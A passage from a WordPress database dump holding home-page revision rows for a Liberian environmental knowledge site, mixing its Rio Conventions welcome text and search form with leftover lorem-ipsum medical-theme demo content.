src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:20:58','2019-11-08 17:20:58','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(395,1,'2019-11-08 17:23:04','2019-11-08 17:23:04','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_957412.jpg\" title=\"\" alt=\"\" />											\n			<h3>Pediatric Clinic</h3><p>Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_369542.jpg\" title=\"\" alt=\"\" />											\n			<h3>Dental Clinic</h3><p>Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n			<a href=\"#\" role=\"button\">\n						Register Now\n					</a>\n							saved hearts\n				+\n							happy patients\n				+\n							doctors number\n							saved lungs\n			<h2>What Our Patients Say</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n							Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_428339.jpg\" title=\"\" alt=\"\" />						\n													Mike Wright\n																			Patient #1\n							Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_324658.jpg\" title=\"\" alt=\"\" />						\n													Nancy Green\n																			Patient #3\n							Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_301284.jpg\" title=\"\" alt=\"\" />						\n													Frances Lopez\n																			Patient #2\n							Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\n							<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_91227.jpg\" title=\"\" alt=\"\" />						\n													Nick Smith\n																			Patient #4\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:23:04','2019-11-08 17:23:04','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(396,1,'2019-11-08 17:24:22','2019-11-08 17:24:22','','featured_forest_biodiversity','Photo by: Trokon Saykpa','inherit','open','closed','','featured_forest_biodiversity','','','2019-11-09 14:43:47','2019-11-09 14:43:47','',9,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_forest_biodiversity.jpg',0,'attachment','image/jpeg',0),(398,1,'2019-11-08 17:25:23','2019-11-08 17:25:23','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n				<h3>\n					Cardiac Rehab\n				</h3>\n								<p>Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Gynecology\n				</h3>\n								<p>Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Symptom Check\n				</h3>\n								<p>Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					Rehabilitation\n				</h3>\n								<p>Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.</p>\n			<a href=\"#\" role=\"button\">\n						Learn More\n					</a>\n				<h3>\n					General Surgery\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					Pediatric Clinic\n				</h3>\n								<p>Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital</p>\n				<h3>\n					Emergency Departments\n				</h3>\n								<p>Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.</p>\n				<h3>\n					24/7 Services\n				</h3>\n								<p>Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.</p>\n			<h2>Reserve now in our hospital</h2>		\n		Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed		\n										<img src=\"https://medical.oceanwp.org/wp-content/uploads/2017/09/img_563214.jpg\" title=\"\" alt=\"\" />											\n			<h3>Transplant Services</h3><p>Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent</p>		\n			<a href=\"#\" role=\"button\">\n						Read More\n					</a>\n										<img 